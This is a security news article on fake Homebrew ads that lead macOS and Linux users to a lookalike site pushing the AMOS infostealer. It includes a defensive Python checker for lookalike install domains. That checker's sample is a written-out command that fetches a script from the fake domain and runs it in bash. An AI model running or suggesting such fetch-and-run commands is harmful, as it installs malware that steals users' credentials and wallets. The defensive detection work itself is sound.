Fake Homebrew Infects macOS and Linux Machines with infostealer

📟 News

Date: 22/01/2025

Attackers use Google ads to disguise themselves as the Homebrew website and distribute malware targeting Mac and Linux systems and stealing logon credentials, browser data, and cryptocurrency wallets.

The malicious Google ads were first spotted by security researcher Ryan Chenkie. According to Bleeping Computer, the malware used in this campaign is AmosStealer (aka Atomic). This infostealer is designed for systems running macOS and is sold as a subscription ($1,000 per month).

In the past, this malware was spotted in other malvertising campaigns promoting fake Google Meet pages. According to researchers, AmosStealer is currently the main infostealer for hackers targeting Apple users.

Homebrew is a third-party package manager for macOS and Linux whose popularity is being exploited by criminals. Malvertisements spotted on Google displayed the correct URL brew.sh, which misled even users familiar with the project. However, these ads actually redirected victims to a fake Homebrew website located at brewe[.]sh.

Malicious ad (source: @ryanchenkie)

It must be noted that malefactors have been using this tactic (i.e. displaying trusted URLs in their ads to trick users into visiting supposedly official sites) for a long time. Earlier, experts found similar malicious ads disguised as Google Authenticator and Google Ads.

In the new campaign, the potential victim lands on the fake website and is prompted to install Homebrew by pasting a command shown on the page into the macOS Terminal or a Linux shell prompt. Importantly, the real Homebrew website asks the user to run a similar command to install the legitimate software. But executing the command from the fake website downloads the Amos infostealer to the user’s device; this malware targets over 50 cryptocurrency browser extensions, desktop wallets (including Binance, Coinomi, Electrum, and Exodus), and data stored in web browsers.

Fake website (source: @ryanchenkie)
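The lookalike-domain trick described above can be caught before a pasted install one-liner is run. The following is an added example (not code from the article or from the Homebrew project) that extracts the URLs from such a command, accepts only the hosts the genuine install flow uses (brew.sh and raw.githubusercontent.com, which serves the official install.sh, an assumption from outside the article), and flags any host within two edits of a trusted one as a lookalike; the fake command with brewe.sh is constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Hosts the genuine Homebrew install flow uses (assumed, not from the article).
TRUSTED_HOSTS = {"brew.sh", "raw.githubusercontent.com", "github.com"}

# Matches http(s) URLs inside a shell one-liner; stops at quotes and ')'.
URL_RE = re.compile(r"https?://[^\s\"')]+")


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to spot one-character lookalikes such as brewe.sh."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # delete from a
                           cur[j - 1] + 1,         # insert into a
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def classify_install_command(cmd: str) -> list[dict]:
    """Return one verdict per URL found in a pasted install one-liner."""
    verdicts = []
    for url in URL_RE.findall(cmd):
        host = (urlparse(url).hostname or "").lower()
        if host in TRUSTED_HOSTS:
            verdict = "trusted"
        else:
            # Anything within two edits of a trusted domain is a lookalike.
            closest = min(TRUSTED_HOSTS, key=lambda t: levenshtein(host, t))
            verdict = "lookalike" if levenshtein(host, closest) <= 2 else "unknown"
        verdicts.append({"url": url, "host": host, "verdict": verdict})
    return verdicts


def display_host_mismatch(displayed_url: str, landing_url: str) -> bool:
    """True when the URL shown in an ad and the page it lands on differ by host."""
    shown = (urlparse(displayed_url).hostname or "").lower()
    landed = (urlparse(landing_url).hostname or "").lower()
    return shown != landed


if __name__ == "__main__":
    # Constructed sample: a fake install command pointing at the lookalike domain.
    fake = '/bin/bash -c "$(curl -fsSL https://brewe.sh/install.sh)"'
    for v in classify_install_command(fake):
        print(v["host"], "->", v["verdict"])
    print("ad mismatch:", display_host_mismatch("https://brew.sh", "https://brewe.sh/"))
```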

Homebrew’s project leader, Mike McQuaid, told journalists that the Homebrew developers are aware of the situation, but emphasized that it’s beyond their control, criticizing Google for its lack of scrutiny.

“There’s little we can do about this really, it keeps happening again and again and Google seems to like taking money from scammers. Please signal-boost this and hopefully someone at Google will fix this for good,” McQuaid said.
